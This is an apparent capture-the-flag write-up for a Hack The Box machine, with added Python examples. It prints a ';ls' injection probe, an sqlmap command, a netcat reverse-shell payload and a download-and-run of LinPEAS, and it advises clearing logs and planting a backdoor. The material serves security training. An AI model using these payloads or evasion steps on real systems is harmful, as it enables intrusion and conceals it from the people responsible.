Lockpick Writeup | Hack The Box

Introduction

Hack The Box (HTB) is a popular online platform that provides a variety of virtual machines (VMs) and challenges for aspiring and professional penetration testers. One of these challenges is the “Lockpick” machine, which offers a comprehensive experience in testing one’s skills in web application security, system exploitation, and privilege escalation. In this writeup, we’ll dive into the step-by-step process of compromising the Lockpick machine, providing detailed explanations and insights into each step.

Lockpick Writeup

Setting Up the Lockpick Environment

VPN Connection

To start with HTB challenges, you need to connect to the HTB VPN. This connection provides access to the private network where all HTB machines are hosted.

  1. Download the VPN Configuration File: From the HTB website, download the VPN configuration file (usually a .ovpn file).
  2. Connect to VPN: Use a VPN client like OpenVPN to connect using the downloaded file:

     sudo openvpn --config <your_vpn_file.ovpn>

Tools Required

Ensure you have the necessary tools installed on your machine. For this writeup, we will primarily use:

  • Nmap
  • Burp Suite
  • SQLmap
  • netcat
  • LinPEAS (Linux Privilege Escalation Awesome Script)
  • Metasploit

Initial Enumeration

Nmap Scan

Our first step in tackling the Lockpick machine is to perform a comprehensive network scan using Nmap to identify open ports and running services.

nmap -sC -sV -oN lockpick_nmap.txt <IP_address>

Analyzing Open Ports

From the Nmap scan results, look for open ports and services that might present vulnerabilities. Commonly targeted ports include HTTP (80, 8080), HTTPS (443), SSH (22), and others.
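To make the "look for open ports" step concrete, here is an added example (not part of the original writeup) that parses the normal-output format produced by the `-oN` flag above and triages each open port. The scan text is a constructed sample, not a real Lockpick scan, and the function names are my own.

```python
import re

# Constructed sample of `nmap -sC -sV -oN` normal output; not a real scan result.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.94 scan initiated as: nmap -sC -sV -oN lockpick_nmap.txt 10.10.10.10
Nmap scan report for 10.10.10.10
Host is up (0.045s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE    SERVICE    VERSION
22/tcp   open     ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http       Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Login
443/tcp  closed   https
8080/tcp filtered http-proxy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# One nmap port line: "<port>/<proto>  <state>  <service>  [version text]".
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp|sctp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)

# Ports the writeup singles out as common first targets.
COMMONLY_TARGETED = {22: "SSH", 80: "HTTP", 443: "HTTPS", 8080: "HTTP-alt"}

def parse_nmap_normal(text):
    """Return one dict per port line in nmap's -oN output (NSE script lines are skipped)."""
    results = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            rec = m.groupdict()
            rec["port"] = int(rec["port"])
            rec["version"] = rec["version"].strip()
            results.append(rec)
    return results

def open_ports(text):
    """Only the ports nmap reports as open, in scan order."""
    return [r for r in parse_nmap_normal(text) if r["state"] == "open"]

def triage(text):
    """Per open port: is it a commonly targeted service, and did -sV recover a
    version string that can be checked against vendor advisories?"""
    return [
        {"port": r["port"], "service": r["service"],
         "common": r["port"] in COMMONLY_TARGETED, "has_version": bool(r["version"])}
        for r in open_ports(text)
    ]

if __name__ == "__main__":
    for row in triage(SAMPLE_NMAP_OUTPUT):
        print(row)
```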

Web Application Analysis

Inspecting the Web Server

Navigate to the web server in your browser and perform an initial inspection. Look for any login forms, input fields, or other interactive elements.

Identifying Vulnerabilities

Use tools like Burp Suite to intercept and analyze traffic between your browser and the web server. This can help identify common web vulnerabilities such as:

  • SQL Injection
  • Command Injection
  • Cross-Site Scripting (XSS)

Exploiting Vulnerabilities

SQL Injection

If an SQL injection vulnerability is identified, use SQLmap to automate the exploitation process:

sqlmap -u "http://<IP_address>/vulnerable_page" --dbs

Command Injection

Command injection can be tested by submitting payloads designed to execute commands on the server. For instance, try appending ;ls to an input field and observe if the response includes a directory listing.
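Why the ;ls probe works, and what the fix looks like, as an added example that is not code from the original writeup: a constructed "ping a host" feature in its vulnerable form beside a hardened one. The hostname allowlist, the `shell_would_run` helper and the function names are my own assumptions.

```python
import re
import shlex

# Allowlist for the one value this feature should accept: a hostname or IPv4
# address. Anything else is rejected outright rather than "sanitised".
HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")

def vulnerable_command(host):
    """Vulnerable pattern: raw input pasted into a shell string.
    Run with subprocess.run(cmd, shell=True), /bin/sh parses it, so the
    page's ';ls' probe ("10.0.0.5;ls") runs ping and then ls."""
    return f"ping -c 1 {host}"

def shell_would_run(cmd):
    """Split a shell string into the separate commands /bin/sh would execute.
    Constructed helper for illustration: shell-style tokenising with
    ; & | && || treated as command separators."""
    tokens = list(shlex.shlex(cmd, posix=True, punctuation_chars=True))
    commands, current = [], []
    for tok in tokens:
        if tok in (";", "&", "|", "&&", "||"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands

def hardened_argv(host):
    """Hardened pattern: validate against the allowlist, then build an argv list.
    Pass the list to subprocess.run() without shell=True: it goes straight to
    execve(), so ';' or '|' inside `host` is just bytes in one argument.
    Returns None when the input is rejected."""
    if not HOST_RE.fullmatch(host):
        return None
    return ["ping", "-c", "1", host]

if __name__ == "__main__":
    probe = "10.0.0.5;ls"
    print("vulnerable string would run:", shell_would_run(vulnerable_command(probe)))
    print("hardened argv:", hardened_argv(probe))  # None: rejected before any exec
```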

Gaining Initial Access

Obtaining a Shell

After identifying a command injection vulnerability, you can use it to spawn a reverse shell. A common payload for this purpose is:

nc -e /bin/sh <your_IP_address> <your_port>

Verifying Access

Once the shell is spawned, verify your access by checking the current user and listing the files in the home directory.

Privilege Escalation

Enumeration of System Information

Use automated scripts like LinPEAS to enumerate system information and identify potential privilege escalation vectors:

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Finding Privilege Escalation Vectors

Look for common misconfigurations and weaknesses such as:

  • Writable /etc/passwd or /etc/shadow
  • Sudo rights for the current user
  • Vulnerable SUID binaries
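The three bullets above are also the checks a hardening audit should run before a box is ever exposed. As an added example (my own code, not LinPEAS and not from the original writeup), this script flags group/world-writable sensitive files and SUID binaries outside an expected baseline; the baseline set and the constructed fixture tree are assumptions for illustration.

```python
import os
import stat
import tempfile
from pathlib import Path

# Files that must only be writable by root (the writeup's first bullet).
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "/etc/sudoers")
# Constructed baseline: SUID binaries that are normal on a stock Debian/Ubuntu
# install. Anything with the bit set outside this list deserves a second look.
EXPECTED_SUID = {"passwd", "sudo", "su", "mount", "umount", "chsh", "chfn", "gpasswd", "newgrp"}

def group_or_world_writable(path):
    """True if group or other has write permission; a missing file is not a finding."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def find_suid(roots):
    """Regular files with the setuid bit set under the given directories."""
    found = []
    for root in roots:
        for p in Path(root).rglob("*"):
            try:
                st = p.lstat()
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(str(p))
    return sorted(found)

def audit(sensitive=SENSITIVE_FILES, roots=("/usr/bin", "/usr/sbin", "/bin", "/sbin")):
    """Return human-readable findings; an empty list means nothing stood out."""
    findings = [f"{f} is group/world writable" for f in sensitive if group_or_world_writable(f)]
    findings += [f"unexpected SUID binary: {p}" for p in find_suid(roots)
                 if os.path.basename(p) not in EXPECTED_SUID]
    return findings

def demo_fixture():
    """Constructed tree: a writable 'passwd' plus two SUID files (one expected, one not)."""
    d = Path(tempfile.mkdtemp())
    (d / "passwd").touch(); os.chmod(d / "passwd", 0o666)
    bindir = d / "bin"; bindir.mkdir()
    for name in ("passwd", "oddtool"):
        (bindir / name).touch(); os.chmod(bindir / name, 0o4755)
    return ([str(d / "passwd")], [str(bindir)])

if __name__ == "__main__":
    print(audit(*demo_fixture()))  # constructed tree; call audit() for this host
```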

Exploiting Weaknesses for Root Access

Kernel Exploits

If the kernel is outdated, it might be vulnerable to known exploits. Check the kernel version and search for public exploits on platforms like Exploit-DB.

Misconfigured Services

Services running with elevated privileges but improperly configured can also be exploited. Look for services running as root and investigate their configurations.

Post-Exploitation

Clearing Logs

To cover your tracks, clear the command history and logs. Be cautious, as this step can be detected.

Maintaining Access

Set up a persistent backdoor to maintain access in case the system reboots or your initial shell is terminated.

Conclusion

The Lockpick machine on HTB provides an excellent opportunity to practice real-world penetration testing techniques. By following this writeup, you can systematically approach and exploit the machine, gaining valuable insights into web application security and system exploitation. Always remember to respect ethical guidelines and practice these skills in a controlled, legal environment.

FAQs

What is Hack The Box (HTB)?

HTB is an online platform offering a range of virtual machines and challenges for learning and practicing penetration testing and cybersecurity skills.

What is the purpose of enumeration in penetration testing?

Enumeration involves gathering information about the target system to identify potential vulnerabilities and entry points.

How do I connect to HTB VPN?

Download the VPN configuration file from HTB and use a VPN client like OpenVPN to establish the connection.

What are common tools used in web application security testing?

Common tools include Nmap, Burp Suite, SQLmap, netcat, LinPEAS, and Metasploit.

How can I ensure ethical practice in penetration testing?

Always have explicit permission before testing any system, follow legal guidelines, and use controlled environments like HTB for practice.
